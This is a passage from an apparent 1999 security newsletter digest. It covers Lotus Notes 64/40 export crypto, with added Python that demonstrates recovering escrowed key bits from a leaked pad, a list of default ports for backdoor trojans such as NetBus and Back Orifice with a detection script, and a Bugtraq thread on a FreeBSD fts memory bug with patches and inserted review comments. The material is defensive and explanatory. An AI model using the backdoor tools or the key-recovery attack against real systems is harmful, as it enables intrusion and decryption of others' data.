the International Edition of Notes, 24 of the bits are encrypted under a
public RSA key that was provided to us by the U.S. government and the
result - called a Workfactor Reduction Field - is bound into the encrypted
data. There is no Workfactor Reduction Field in data used only by the
domestic edition of Notes, and there is none for keys that are not used
for data confidentiality (e.g. those used for authentication).
If an attacker wanted to break into a Notes system based on information
obtained by eavesdropping, he would have to exhaustively search a 64 bit
key space. Even the U.S. government would face this workfactor because
there is no Workfactor Reduction Field in keys used for authentication.
An attacker who wanted to read an encrypted document that was either read
from a server or eavesdropped from the wire would face a 64 bit workfactor.
But if the U.S. government needed to decrypt such a document it could
obtain 24 of the bits using its private key and the Workfactor Reduction Field
and then exhaustively search a 40 bit key space.
Tamper resistance: You might wonder what's to prevent someone from deleting
the Workfactor Reduction Field from a document or the setup protocol of a
network connection. This is similar to the problem faced in the Clipper
design to assure that the LEAF field was not removed from a conversation.
In a software only implementation, it is not possible to prevent tampering
entirely. The easiest form of tampering would be to smuggle the North
American Edition CD out of the U.S. or pass it to someone over the
Internet. The best a software implementation can do in terms of tamper
resistance is to make it impossible to remove the Workfactor Reduction
Field without modifying both the source of the data and the destination.
This can be done by having the destination check for the presence of the
Workfactor Reduction Field and refuse to decrypt the data if it is not
there or not correct. The destination can't decrypt the Workfactor
Reduction Field to check it, but knowing the bulk data key and the
government public key, it can regenerate the WRF and compare the result
with the supplied value. RSA has the convenient property that the same
value encrypted twice produces the same result; it would be somewhat more
complex (but still possible) to duplicate this functionality with other
public key algorithms. [Note: for this to work, the random pad that was
used in creating the WRF must be delivered to the recipient of the message.
For it to be secure, it must be delivered encrypted since a clever attacker
who knew the pad could do 2^24 trial encryptions to get 24 bits of the key
and then do 2^40 trial decryptions to recover the rest.]
Frequently Asked Questions:
Q: Does this mean that the International Edition of Lotus Notes Release 4
is just as secure as the North American Edition against someone who does
not know the U.S. Government's key.
A: Almost. There are factors other than the 64 and 40 bit secret keys.
The International Edition is still limited to 512 bit RSA keys when they
are used for data confidentiality. The North American Edition uses 630 bit
RSA keys in this context. While 512 bit RSA keys are considerably more
secure than 40 bit secret keys, they are not as secure as 64 bit keys, so in
both cases it would be more cost effective to attack the RSA keys than to
attack the secret keys. In considering the security of the International
Edition, users must also assess the likelihood that an attacker might learn the
government's private key either by breaking through the government's
protective mechanisms or by breaking the single RSA key. If either were
to happen, the International Edition would become only as secure as other
40 bit products.
Q: Does Lotus also have a copy of the private key used to reduce the
workfactor from 64 to 40 bits?
A: No. The U.S. government generated the RSA key and supplied us with
the public component. We never had access to the private component (which
made debugging this thing a real joy!).
Q: How is this scheme different from Key Escrow?
A: While one goal may be the same - to provide exportable strong
cryptography - there are differences with respect to security,
functionality, and administrative convenience. It is more secure than
Key Escrow in that even if third parties misbehave, there remains a
substantial workfactor in breaking each individual message. It may be
more or less secure than Key Escrow depending on the policies of the
holder of the U.S. government key compared to the policies of possible
Key Escrow agents. It is less functional than some Key Escrow proposals
because it is impractical to use this facility to recover lost keys. And
it is more administratively convenient than key escrow because there is no
communication with third parties necessary as part of setup. Notes is
secure 'out of the box'.
Q: Does this scheme address law enforcement concerns within the U.S.
(i.e. should it be considered an alternative to Clipper)?
A: No. In only one way does this scheme address the Law Enforcement
interests of either U.S. or foreign governments: better information
security helps Law Enforcement to guard against information-related crimes.
As indicated by our continuing to go to considerable expense to maintain
both domestic and international editions, we continue to oppose any
limits on domestic use of strong cryptography.
</whitepaper>
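The 64/40 scheme and the recipient-side tamper check described in the white paper above, worked through as an added example for this digest; this is illustration code, not Lotus Notes or Iris Associates code. It assumes a toy RSA key built from two known Mersenne primes in place of the government-supplied key, a 40-bit random pad, and an RSA plaintext laid out as the pad followed by the top 24 key bits; none of these details are fixed by the white paper. It also carries out the attack the paper's bracketed note warns about: an attacker who learns the pad recovers the 24 escrowed bits with trial encryptions alone.

```python
"""Toy walk-through of Differential Workfactor Cryptography ("64/40").

Added illustration, not Lotus Notes or Iris Associates code.  Assumptions
(none fixed by the white paper): toy RSA modulus from two known Mersenne
primes instead of the government key, a 40-bit random pad, and the RSA
plaintext laid out as (pad << 24) | top 24 bits of the bulk key.
"""
import secrets

# Toy stand-in for the U.S. government RSA key.  2^61-1 and 2^31-1 are primes,
# so N is about 2^92: larger than the 64-bit plaintext.  65537 is coprime to
# (P-1)(Q-1) because 65537 divides 2^k-1 only when 32 divides k.
P = (1 << 61) - 1
Q = (1 << 31) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # held by the government only; Lotus never had it

KEY_BITS, ESCROWED_BITS = 64, 24
RESIDUAL_BITS = KEY_BITS - ESCROWED_BITS     # 40: the government's remaining search
PAD_BITS = 40
TOP_MASK = (1 << ESCROWED_BITS) - 1
LOW_MASK = (1 << RESIDUAL_BITS) - 1


def make_bulk_key() -> int:
    """Fresh 64-bit bulk data key, as generated for a confidentiality use."""
    return secrets.randbits(KEY_BITS)


def make_pad() -> int:
    """Random pad; it must travel to the recipient encrypted (see the paper's note)."""
    return secrets.randbits(PAD_BITS)


def build_wrf(key64: int, pad: int) -> int:
    """Workfactor Reduction Field: textbook RSA of (pad || top 24 key bits).

    Textbook RSA is deterministic, the property the paper relies on: anyone who
    knows key64 and pad can recompute the field and compare it.
    """
    plaintext = (pad << ESCROWED_BITS) | (key64 >> RESIDUAL_BITS)
    return pow(plaintext, E, N)


def verify_wrf(key64: int, pad: int, wrf) -> bool:
    """Recipient-side tamper check: refuse to decrypt if the WRF is missing or wrong."""
    return wrf is not None and build_wrf(key64, pad) == wrf


def government_recover_top24(wrf: int) -> int:
    """Private-key holder strips the pad and learns 24 of the 64 key bits."""
    return pow(wrf, D, N) & TOP_MASK


def assemble_key(top24: int, low40: int) -> int:
    """Key the government ends up with after a 2^40 search over low40."""
    return (top24 << RESIDUAL_BITS) | (low40 & LOW_MASK)


def recover_top24_with_leaked_pad(pad: int, wrf: int) -> int:
    """The attack the paper warns about: with the pad known, trial encryptions
    recover the escrowed bits without the private key, leaving a 40-bit search.
    Worst case is 2^24 modexps; the loop stops as soon as a guess matches.
    """
    for guess in range(1 << ESCROWED_BITS):
        if pow((pad << ESCROWED_BITS) | guess, E, N) == wrf:
            return guess
    raise ValueError("no 24-bit value reproduces this WRF under this pad")


if __name__ == "__main__":
    key, pad = make_bulk_key(), make_pad()
    wrf = build_wrf(key, pad)
    print("recipient accepts WRF:", verify_wrf(key, pad, wrf))
    print("recipient rejects altered WRF:", not verify_wrf(key, pad, (wrf + 1) % N))
    top24 = government_recover_top24(wrf)
    print("government recovered top 24 bits:", top24 == key >> RESIDUAL_BITS,
          "remaining search: 2^%d" % RESIDUAL_BITS)
```

The check in verify_wrf is the whole of the software tamper resistance the paper describes: the recipient cannot decrypt the field, but because textbook RSA is deterministic it can re-encrypt and compare, so stripping or altering the field only works if both ends are modified. The leaked-pad loop shows why the pad has to be delivered encrypted; on a real key it is 2^24 modular exponentiations, which is why the example below keeps the escrowed bits small.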
@HWA
18.0 Packetstorm Security Gets the choke order for .yu sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
execorder.txt - Last week, I received a copy of an "Executive Order" from The White House,
signed by President Clinton, along with several emails informing me that it is now illegal
for me to "provide any software or technology to Yugoslavia and Montenegro". In other words,
I was told that I need to restrict access to this web site so that anybody from the .yu TLD
could not access and download "exploits" and "hacker tools". It was suggested that I deny
access to anybody using proxies, anonymizers, non-resolvable IP addresses, and of course
anybody from Yugoslavia. This is absurd. Here is my "Executive Reply" to President Clinton:
Fuck you and your stupid orders, Bill.
THE WHITE HOUSE
Office of the Press Secretary
________________________________________________________________________
For Immediate Release May 1, 1999
EXECUTIVE ORDER
- - - - - - -
BLOCKING PROPERTY OF THE GOVERNMENTS
OF THE FEDERAL REPUBLIC OF YUGOSLAVIA (SERBIA AND MONTENEGRO),
THE REPUBLIC OF SERBIA, AND THE REPUBLIC OF MONTENEGRO,
AND PROHIBITING TRADE TRANSACTIONS INVOLVING
THE FEDERAL REPUBLIC OF YUGOSLAVIA (SERBIA AND MONTENEGRO)
IN RESPONSE TO THE SITUATION IN KOSOVO
By the authority vested in me as President by the Constitution and
the laws of the United States of America, including the International
Emergency Economic Powers Act (IEEPA) (50 U.S.C. 1701 et seq.), the
National Emergencies Act (50 U.S.C. 1601 et seq.), and section 301 of
title 3, United States Code,
I, WILLIAM J. CLINTON, President of the United States of America, in
order to take additional steps with respect to the continuing human
rights and humanitarian crisis in Kosovo and the national emergency
described and declared in Executive Order 13088 of June 9, 1998, hereby
order:
Section 1. Amendment to Executive Order 13088. (a) Section 1(a) of
Executive Order 13088 of June 9, 1998, is revised to read as follows:
"Section 1. (a) Except to the extent provided in section 203(b)
of IEEPA (50 U.S.C. 1702(b)), and in regulations, orders,
directives, or licenses that may hereafter be issued pursuant to
this order, all property and interests in property of the
Governments of the Federal Republic of Yugoslavia (Serbia and
Montenegro), the Republic of Serbia, and the Republic of Montenegro
that are in the United States, that hereafter come within the
United States, or that are or hereafter come within the possession
or control of United States persons, including their overseas
branches, are hereby blocked."
(b) Section 2 of Executive Order 13088 is hereby revoked, and a new
section 2 is added to read as follows:
"Sec. 2. Except to the extent provided in section 203(b) of
IEEPA (50 U.S.C. 1702(b)) and in regulations, orders, directives,
or licenses that may hereafter be issued pursuant to this order,
and notwithstanding any contract entered into or any license or
permit granted prior to the effective date of this order, the
following are prohibited:
"(a) the exportation, reexportation, sale, or supply, directly
or indirectly, from the United States, or by a United States
person, wherever located, to the Federal Republic of Yugoslavia
(Serbia and Montenegro) or the Government of the Federal Republic
of Yugoslavia (Serbia and Montenegro), the Government of the
Republic of Serbia, or the Government of the Republic of
Montenegro, of any goods (including petroleum and petroleum
products), software, technology (including technical data), or
services;
"(b) the importation into the United States, directly or
indirectly, of any goods, software, technology (including technical
data), or services from the Federal Republic of Yugoslavia (Serbia
and Montenegro) or owned or controlled by the Government of the
Federal Republic of Yugoslavia (Serbia and Montenegro), the
Government of the Republic of Serbia, or the Government of the
Republic of Montenegro; and
"(c) any transaction or dealing by a United States person,
wherever located, in goods, software, technology (including
technical data), or services, regardless of country of origin, for
exportation, reexportation, sale, or supply to, or exportation from
or by, the Federal Republic of Yugoslavia (Serbia and Montenegro)
or the Government of the Federal Republic of Yugoslavia (Serbia and
Montenegro), the Government of the Republic of Serbia, or the
Government of the Republic of Montenegro. This prohibition
includes, without limitation, purchase, sale, transport, swap, or
brokerage transactions in such items, and approving, financing,
insuring, facilitating, or guaranteeing any such transactions."
(c) Section 4 of Executive Order 13088 is revised to read as follows:
"Sec. 4. Any transaction by a United States person that evades
or avoids, or has the purpose of evading or avoiding, or attempts
to violate, any of the prohibitions set forth in this order is
prohibited. Any conspiracy formed to violate the prohibitions of
this order is prohibited."
(d) Section 7 of Executive Order 13088 is revised to read as follows:
"Sec. 7. (a) The Secretary of the Treasury, in consultation with
the Secretary of State, shall give special consideration to the
circumstances of the Government of the Republic of Montenegro and
persons located in and organized under the laws of the Republic of
Montenegro in the implementation of this order.
"(b) The Secretary of the Treasury, in consultation with the
Secretary of State, shall give special consideration to the
humanitarian needs of refugees from Kosovo and other civilians
within the Federal Republic of Yugoslavia (Serbia and Montenegro)
in the implementation of this order.
"(c) The Secretary of the Treasury, in consultation with the
Secretary of State, is hereby directed to authorize commercial
sales of agricultural commodities and products, medicine, and
medical equipment for civilian end use in the territory of the
Federal Republic of Yugoslavia (Serbia and Montenegro) under
appropriate safeguards to prevent diversion to military,
paramilitary, or political use by the Government of the Federal
Republic of Yugoslavia (Serbia and Montenegro), the Government of
the Republic of Serbia, or the Government of the Republic of
Montenegro."
Sec. 2. Preservation of Authorities. Nothing in this order is
intended to affect the continued effectiveness of any rules,
regulations, orders, licenses, or other forms of administrative action
issued, taken, or continued in effect heretofore or hereafter under the
authority of IEEPA, except as hereafter terminated, modified, or
suspended by the issuing Federal agency.
Sec. 3. No rights or privileges conferred. Nothing contained in
this order shall confer any substantive or procedural right or privilege
on any person or organization, enforceable against the United States,
its agencies or its officers.
Sec. 4. (a) Effective date. This order is effective at 12:01 a.m.
eastern daylight time on May 1, 1999.
(b) Transmittal; Publication. This order shall be transmitted to the
Congress and published in the Federal Register.
WILLIAM J. CLINTON
THE WHITE HOUSE,
April 30, 1999.
# # #
@HWA
19.0 Common Trojans and the ports they can be found on
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
After seeing several questions about traffic directed at ports such as 31337 and
12345 I've put together a list of all trojans known to me and the default
ports they are using. Of course several of them could use any port, but I
hope this list will maybe give you a clue of what might be going on.
port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
Stealth, Terminator, WinPC, WinSpy
port 31 - Hackers Paradise
port 80 - Executor
port 456 - Hackers Paradise
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Satanz Backdoor
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1245 - VooDoo Doll
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4590 - ICQTrojan
port 5000 - Sockets de Troie
port 5001 - Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack'99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil
You'll find the list on the following address:
http://www.simovits.com/nyheter9902.html (still in Swedish but it will be
translated in the near future).
To help anyone to detect trojan attacks, I'm planning to add information
about the original names of the executables, their size, where they usually
are hiding, and the names of any helpfiles they may use. I will also add
tools or links to tools that may be of your assistance.
Feel free to get back to me with any comments or suggestions. If you find
new trojans I'd love to get my hands on them, but please mail me first, as
I don't need more than one copy. If you have live experience of trojan
attacks I'm interested to read about your findings.
Joakim
joakim.von.braun@risab.se
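As an added example for this digest, not code from the post above or from the simovits.com list it points to: a small scanner that reads `netstat -an` output and reports sockets touching one of these default ports, with the post's own caveat built in (most of these trojans can be moved to any port, and several defaults sit on ports a legitimate service also uses). The port table is a subset of the list above and the netstat text is constructed sample input.

```python
"""Spot default trojan ports in netstat output.

Added example for this digest, not code from the original post or from the
simovits.com list.  TROJAN_PORTS is a subset of the list above; SAMPLE_NETSTAT
is constructed input in the layout of Windows `netstat -an`.  As the post says,
most of these trojans can be reconfigured to any port, so a hit is a lead to
chase (which process owns the socket?), not proof, and a miss proves nothing.
"""
import re
from typing import List, NamedTuple

# port -> (trojans using it by default, True if a standard service also lives there)
TROJAN_PORTS = {
    21:    ("Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash", True),
    23:    ("Tiny Telnet Server", True),
    25:    ("Antigen, Email Password Sender, Shtrilitz Stealth, Terminator, WinPC, WinSpy", True),
    80:    ("Executor", True),
    555:   ("Ini-Killer, Phase Zero, Stealth Spy", False),
    2140:  ("Deep Throat, The Invasor", False),
    6670:  ("DeepThroat", False),
    12345: ("GabanBus, NetBus", False),
    12346: ("GabanBus, NetBus", False),
    20034: ("NetBus 2 Pro", False),
    31337: ("Back Orifice", False),
    31338: ("Back Orifice, DeepBO", False),
    33333: ("Prosiak", False),
}

# Constructed sample: a clean listener (135), a NetBus listener, a web server on
# 80, an outbound connection to a NetBus 2 Pro port, and a UDP socket on 31337.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1044       10.0.0.7:20034         ESTABLISHED
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:137            *:*
"""

# proto, local addr, local port, foreign addr, foreign port, optional state
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)(?:\s+(\S+))?\s*$")


class Finding(NamedTuple):
    kind: str    # "listening": a socket bound here; "remote": we connected out to it
    proto: str
    port: int
    names: str
    note: str


def scan_netstat(text: str) -> List[Finding]:
    """Walk netstat lines and report sockets touching a default trojan port."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # banner, header or blank line
        proto, _laddr, lport, _faddr, fport, state = m.groups()
        lport = int(lport)
        # UDP rows carry no state column; a bound UDP socket is as good as LISTENING.
        bound = proto == "UDP" or state == "LISTENING"
        if bound and lport in TROJAN_PORTS:
            names, collides = TROJAN_PORTS[lport]
            note = ("shared with a standard service: identify the owning binary before judging"
                    if collides else
                    "no standard service belongs here: identify the owning process")
            findings.append(Finding("listening", proto, lport, names, note))
        elif state == "ESTABLISHED" and fport.isdigit() and int(fport) in TROJAN_PORTS:
            names, _ = TROJAN_PORTS[int(fport)]
            findings.append(Finding("remote", proto, int(fport), names,
                                    "this host connected out to a trojan default port; "
                                    "it may be running the client side"))
    return findings


if __name__ == "__main__":
    for f in scan_netstat(SAMPLE_NETSTAT):
        print(f"{f.kind:9} {f.proto} {f.port:5}  {f.names}  ({f.note})")
```

To use it on a live box, feed the output of `netstat -an` to scan_netstat instead of SAMPLE_NETSTAT; the two kinds of finding are deliberately separate, since a listener on 12345 says something about this host while an established connection to a remote 20034 says something about what this host is doing to someone else.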
@HWA
20.0 Fts_read vulnerability provides root compromise in FreeBSD find, du
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 12 May 1999 14:32:42 +0400
From: Stas Kisel <stas@SONET.CRIMEA.UA>
To: BUGTRAQ@netspace.org
Subject: fts, du, find
Hi.
I use FreeBSD-2.2.8 and FreeBSD-2.2.7 and I know that these versions are
no longer supported, but:
1. There are many people still using 2.2
2. This bug probably applies to FreeBSD-3.1 and even to OpenBSD and others.
Approximately a month ago I found a very strange behaviour of 'du'
with long directory structures. I left this alone due to lack of time,
but some days ago I saw an article on bugtraq concerning similar
behaviour of 'find'.
There is one bug in libc causing this behaviour. I have a patch, but
I have not tested it much ;)
Both 'find' and 'du' use 'fts' (fts_read,...) functions to traverse
directory structure.
fts uses realloc() to reallocate memory in quite complex lists.
There is a bug in adjusting pointers after realloc().
So when dealing with large directory structures (when realloc() needed),
some pointers can point to free()-ed memory.
I have no exploit and probably will not have the free time (I think
3 days is more than enough) to do it, but I believe it is
possible to exploit this bug using carefully designed directory
tree to execute arbitrary commands as root during
/etc/daily->/etc/security->find.
REMOTE ROOT EXPLOIT (POSSIBLE).
At least it is possible to hide setuid binary this way in home dir or in /tmp.
The following patch is designed for FreeBSD-2.2.8-RELEASE libc.
There was the following ID in the beginning of the source file.
/* $OpenBSD: fts.c,v 1.9 1997/08/02 00:13:49 millert Exp $ */
I've only tested this patch on one machine during one day, so
it is probably buggy.
If you'll apply this patch, please drop me a line if there was any side effect
and I'll do a followup in the bugtraq, say, on the Friday.
------------------ patch ----------------------------------------
--- /usr/src/lib/libc/gen/fts.c.orig Tue May 11 13:37:49 1999
+++ /usr/src/lib/libc/gen/fts.c Wed May 12 13:16:08 1999
@@ -740,8 +740,26 @@
* If had to realloc the path, adjust the addresses for the rest
* of the tree.
*/
- if (adjaddr)
+ if (adjaddr){
fts_padjust(sp, adjaddr);
+ /* Adjust the list, because we want to return it robust. */
+/* fix p->fts_path and p->fts_accpath
+ p->fts_accpath can be:
+ either cur->fts_path (adjust, because cur is already adjusted)
+ either p->fts_path (adjust)
+ either p->fts_name (do not adjust)
+ I'm also almost sure that in first case cur->fts_path=p->fts_path...
+*/
+#define ADJUST1(p) if((p)->fts_path != adjaddr){ \
+ if((p)->fts_accpath != (p)->fts_name){ \
+ (p)->fts_accpath = \
+ (char *)adjaddr + ((p)->fts_accpath - (p)->fts_path);\
+ } \
+ (p)->fts_path = adjaddr; \
+}
+ for (p = head; p; p = p->fts_link)
+ ADJUST1(p);
+ }
/*
* If not changing directories, reset the path back to original
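Review bot: the new ADJUST1 loop is only correct if the assumption in its own comment holds ("I'm also almost sure that in first case cur->fts_path=p->fts_path"); the guard `if((p)->fts_path != adjaddr)` is the sole thing stopping an entry whose fts_accpath points into cur's already-adjusted buffer from being offset a second time, and in that case `(p)->fts_accpath - (p)->fts_path` would mix a new-buffer address with an old one. Replace the assumption with a check: remember the pre-realloc buffer address and adjust only pointers that fall inside the old buffer, or at least assert the cur->fts_path == p->fts_path relationship instead of trusting it. Minor: the macro is defined inside the function body with no #undef, and as a bare `if` it will misbind any `else` placed after a future `ADJUST1(p);`, so wrap it in `do { ... } while (0)`.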
@@ -974,18 +992,18 @@
{
FTSENT *p;
-#define ADJUST(p) { \
+#define ADJUST2(p) { \
(p)->fts_accpath = \
(char *)addr + ((p)->fts_accpath - (p)->fts_path); \
(p)->fts_path = addr; \
}
/* Adjust the current set of children. */
for (p = sp->fts_child; p; p = p->fts_link)
- ADJUST(p);
+ ADJUST2(p);
/* Adjust the rest of the tree. */
for (p = sp->fts_cur; p->fts_level >= FTS_ROOTLEVEL;) {
- ADJUST(p);
+ ADJUST2(p);
p = p->fts_link ? p->fts_link : p->fts_parent;
}
}
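Review bot: renaming ADJUST to ADJUST2 changes no behaviour, and the body it keeps still rewrites fts_accpath unconditionally, while the ADJUST1 added earlier in this patch skips entries whose `fts_accpath == fts_name` because, per its comment, fts_name lives outside the path buffer. If that case is real, fts_padjust() still relocates those pointers into the new buffer with a garbage offset every time it runs over the children and the rest of the tree; either apply the same `fts_accpath != fts_name` test here or explain in a comment why children and ancestors can never be in that state. A rename-only hunk should also say in the description why the rename is needed.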
------------------ endpatch ----------------------------------------
--
Stas Kisel
Open Tavrical College Sysadmin stas@sonet.crimea.ua
Simferopol State University Web-designer stas@ccssu.crimea.ua
------------------------------------------------------------------------------------------
Date: Fri, 14 May 1999 04:33:34 -0400
From: Jordan Ritter <jpr5@DARKRIDGE.COM>
To: BUGTRAQ@netspace.org
Subject: Re: fts, du, find
On Wed, 12 May 1999, Stas Kisel wrote:
> 2. This bug probably applies to FreeBSD-3.1 and even to OpenBSD and others.
I found this back a few months ago when working on the wu-ftp stuff..
OpenBSD definitely has the same problem. last thing I remember thinking
was that it was dying because realloc() was failing (as the fts stuff
realloc()'s memory as the path grows) ..
Jordan Ritter
Network Security Engineer
Netect/Bindview Corp Boston, MA
"Quis custodiet ipsos custodes?"
------------------------------------------------------------------------------------------
Date: Fri, 14 May 1999 14:37:03 +0400
From: Stas Kisel <stas@SONET.CRIMEA.UA>
To: BUGTRAQ@netspace.org
Subject: Re: fts...(improved patch)
> From: Jordan Ritter <jpr5@darkridge.com>
> OpenBSD definitely has the same problem. last thing I remember thinking
> was that it was dying because realloc() was failing (as the fts stuff
> realloc()'s memory as the path grows) ..
fts realloc (pathlen+~1000b) of memory only, so realloc succeeds.
The bug is in the adjusting pointers after realloc().
The day after sending the patch I found other circumstances that
triggered a similar bug in fts.
This time some pointers were adjusted which did not belong to realloc()-ed
memory chunk.
Improved patch is below. Sorry for inconvenience.
Probably there are some similar bugs in fts code or patch. Please let me
know if you'll see any.
\bye
Stas
----------------------------- patch ----------------------------------
--- /usr/src/lib/libc/gen/fts.c.orig Tue May 11 13:37:49 1999
+++ /usr/src/lib/libc/gen/fts.c Fri May 14 14:02:58 1999
@@ -740,8 +740,26 @@
* If had to realloc the path, adjust the addresses for the rest
* of the tree.
*/
- if (adjaddr)
+ if (adjaddr){
fts_padjust(sp, adjaddr);
+ /* Adjust the list, because we want to return it robust. */
+/* fix p->fts_path and p->fts_accpath
+ p->fts_accpath can be:
+ either cur->fts_path (adjust, because cur is already adjusted)
+ either p->fts_path (adjust)
+ either p->fts_name (do not adjust)
+ I'm also almost sure that in first case cur->fts_path=p->fts_path...
+*/
+#define ADJUST1(p) if((p)->fts_path != adjaddr){ \
+ if((p)->fts_a
ccpath != (p)->fts_name){ \
+ (p)->fts_accpath = \
+ (char *)adjaddr + ((p)->fts_accpath - (p)->fts_path);\
+ } \
+ (p)->fts_path = adjaddr; \
+}
+ for (p = head; p; p = p->fts_link)
+ ADJUST1(p);
+ }
/*
* If not changing directories, reset the path back to original
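Review bot: this hunk is the same as the one in the first patch, so the same concern stands: correctness rests on the "almost sure" comment rather than on a check of where fts_accpath actually points, and the ADJUST1 macro is still a bare `if` with no `do { ... } while (0)` and no #undef after the loop. Separately, the copy posted here has the token `fts_accpath` split across two lines ("fts_a" / "ccpath") inside the macro, so this patch will not apply or compile as pasted; anyone testing it needs to rejoin that line first.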
@@ -974,18 +992,20 @@
{
FTSENT *p;
-#define ADJUST(p) { \
- (p)->fts_accpath = \
- (char *)addr + ((p)->fts_accpath - (p)->fts_path); \
+#define ADJUST2(p) { \
+ if((p)->fts_accpath != (p)->fts_name){ \
+ (p)->fts_accpath = \
+ (char *)addr + ((p)->fts_accpath - (p)->fts_path); \
+ } \
(p)->fts_path = addr; \
}
/* Adjust the current set of children. */
for (p = sp->fts_child; p; p = p->fts_link)
- ADJUST(p);
+ ADJUST2(p);
/* Adjust the rest of the tree. */
for (p = sp->fts_cur; p->fts_level >= FTS_ROOTLEVEL;) {
- ADJUST(p);
+ ADJUST2(p);
p = p->fts_link ? p->fts_link : p->fts_parent;
}
}
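Review bot: adding `if((p)->fts_accpath != (p)->fts_name)` here makes ADJUST2 consistent with ADJUST1, but the two macros now have the same body apart from the base variable (`addr` here, `adjaddr` there); fold them into one helper that takes the new base address so the next fix cannot land in one and not the other. The report says the path buffer grows by roughly pathlen+1000 bytes, and this second version exists because a second trigger was found a day after the first patch, so a regression test that builds a directory tree deep enough to force at least two reallocs during find(1) and du(1) should go in with the change.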
----------------------------- /patch ----------------------------------
------------------------------------------------------------------------------------------
Date: Fri, 14 May 1999 19:14:02 +0200
From: Przemyslaw Frasunek <venglin@GADACZKA.DHS.ORG>
Reply-To: venglin@lagoon.freebsd.org.pl
To: BUGTRAQ@netspace.org
Subject: Re: fts, du, find
> 2. This bug probably applies to FreeBSD-3.1 and even to OpenBSD and others.
Yes, I've tested it on 3.1-STABLE.
> I have no exploit and probably will not have the free time (I think
> 3 days is more than enough) to do it, but I believe it is
> possible to exploit this bug using carefully designed directory
> tree to execute arbitrary commands as root during
> /etc/daily->/etc/security->find.
> REMOTE ROOT EXPLOIT (POSSIBLE).
I think that it will be hard to write an exploit. I've tested it on
my 2.2.8-RELEASE at home.
'Find' segfaults, when it tries to do:
(void)puts(entry->fts_path);
because of junk pointer to structure 'entry'. IMHO it _always_
points to 0x200291d6, so it tries to execute (IMHO) _always_ the
same commands:
0x200291d6 <puts+34>: repnz scasb %es:(%edi),%al
0x200291d7 <puts+35>: scasb %es:(%edi),%al
0x200291d8 <puts+36>: movl %ecx,%eax
0x200291d9 <puts+37>: enter $0xd0f7,$0x89
0x200291da <puts+38>: notl %eax
0x200291db <puts+39>: rorb 0x488de455(%ecx)
0x200291dc <puts+40>: movl %edx,0xffffffe4(%ebp)
0x200291dd <puts+41>: pushl %ebp
0x200291de <puts+42>: inb $0x8d,%al
0x200291df <puts+43>: leal 0xffffffff(%eax),%ecx
0x200291e0 <puts+44>: decl %eax
0x200291e1 <puts+45>: decl 0x938de84d(%ecx)
0x200291e2 <puts+46>: movl %ecx,0xffffffe8(%ebp)
0x200291e3 <puts+47>: decl %ebp
0x200291e4 <puts+48>: call 0xc1532576 <end+2705991902>
and here it segfaults.
--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *
@HWA
21.0 Excel Macro Virus protection patch has a hole
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 13 May 1999 16:12:48 -0400
From: rotaiv <rotaiv@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Microsoft Security Bulletin (MS99-014)
-----BEGIN PGP SIGNED MESSAGE-----
This is in response to the Microsoft Security Bulletin (MS99-014).
